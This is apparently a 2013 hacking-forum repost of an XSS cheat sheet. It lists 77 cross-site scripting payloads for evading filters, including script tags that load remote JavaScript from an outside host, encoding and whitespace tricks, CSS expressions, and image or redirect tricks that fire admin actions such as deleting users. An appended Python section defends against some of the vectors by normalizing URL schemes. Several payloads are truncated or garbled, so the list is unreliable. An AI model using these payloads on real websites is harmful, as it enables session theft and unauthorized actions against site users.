XSS Attack Roundup

Posted on 2013-4-19 19:22:37
It seems there isn't much XSS material on t00ls; I saw some good stuff and copied it over, not sure whether any folks need to bookmark it.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav...omitted...S')>
(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav...omitted...S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61...omitted...&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters in front of the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META refresh to a URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute, split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with STYLE attribute (an open angle bracket followed by a name beginning with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Inside Flash, ActionScript can be used to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) Decimal IP
<A HREF="http://3232235521">XSS</A>
(71) Hexadecimal IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
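Added example, not part of the original post or the cheat sheet it copies: many of the vectors above (items 4, 5, 10 to 14, 17 and 19) exist only because a filter looked for the literal string "javascript:" while the browser decodes entities, drops control characters and folds case before reading the scheme. The Python below normalizes an attribute value the same way and then applies an allow-list of schemes; the function names and the sample values are my own construction.

```python
import html
import re

# Characters that browsers have ignored inside a URL scheme; the set follows the
# code points named in item 47 above (ASCII 1-32, 160, the U+2000 block, 12288, 65279).
# Stripping more than a current browser does only makes the rejection stricter.
_IGNORED = re.compile(r"[\x00-\x20\x7f\u00a0\u2000-\u200b\u3000\ufeff]")

# Schemes used on this page whose URLs run script when the browser resolves them.
SCRIPT_SCHEMES = ("javascript", "vbscript")


def normalize_url(value: str) -> str:
    """Return the value as a browser sees it before the scheme is looked up."""
    # html.unescape handles &#106; and &#x6A with or without the trailing
    # semicolon (items 5, 9, 10); decoding twice also covers double-encoded input.
    decoded = html.unescape(html.unescape(value))
    # Remove tab, CR, LF, NUL and other ignored characters (items 11-14, 17, 19),
    # then fold case (item 4).
    return _IGNORED.sub("", decoded).lower()


def url_scheme(value: str) -> str:
    """Scheme of the normalized URL, or "" for relative / scheme-relative URLs."""
    match = re.match(r"^([a-z][a-z0-9+.-]*):", normalize_url(value))
    return match.group(1) if match else ""


def has_script_scheme(value: str) -> bool:
    """True when the value resolves to a scheme that executes script."""
    return url_scheme(value) in SCRIPT_SCHEMES


def safe_href(value: str) -> bool:
    """Allow-list check for href/src values: only http, https or relative URLs."""
    return url_scheme(value) in ("", "http", "https")


# Constructed samples: obfuscated forms from the list above plus benign URLs.
SAMPLES = {
    "JaVaScRiPt:alert('XSS')": True,                                   # item 4
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;x": True,  # item 5
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A": True,  # item 10
    "jav\tascript:alert('XSS')": True,                                 # item 11
    "jav&#x0A;ascript:alert('XSS')": True,                             # item 13
    "java\x00script:alert('XSS')": True,                               # item 17
    " javascript:alert('XSS')": True,                                  # item 19
    "http://www.google.com./": False,                                  # item 76
    "//www.google.com/": False,                                        # item 74
}

if __name__ == "__main__":
    for url, expected in SAMPLES.items():
        assert has_script_scheme(url) == expected, url
    print("all samples classified as expected")
```

Note that a deny-list on the scheme is still weaker than the allow-list in safe_href, which rejects any scheme the application does not expect.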
